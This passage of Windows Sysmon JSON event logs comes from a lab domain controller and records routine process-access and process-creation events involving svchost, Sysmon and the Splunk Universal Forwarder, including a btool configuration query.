C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1734,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1735,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1736,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1737,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1738,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1739,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010FC6B0300}\r\nTargetProcessId: 3980\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010FC6B0300}","TargetProcessId":"3980","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1740,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.049\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010FC6B0300}\r\nSourceProcessId: 3980\r\nSourceThreadId: 3984\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.049","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010FC6B0300}","SourceProcessId":"3980","SourceThreadId":"3984","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1741,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.125\r\nProcessGuid: {41C8662E-1F75-5F25-0000-0010C97B0300}\r\nProcessId: 4004\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F74-5F25-0000-0010FC670300}\r\nParentProcessId: 3928\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.125","ProcessGuid":"{41C8662E-1F75-5F25-0000-0010C97B0300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F74-5F25-0000-0010FC670300}","ParentProcessId":"3928","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  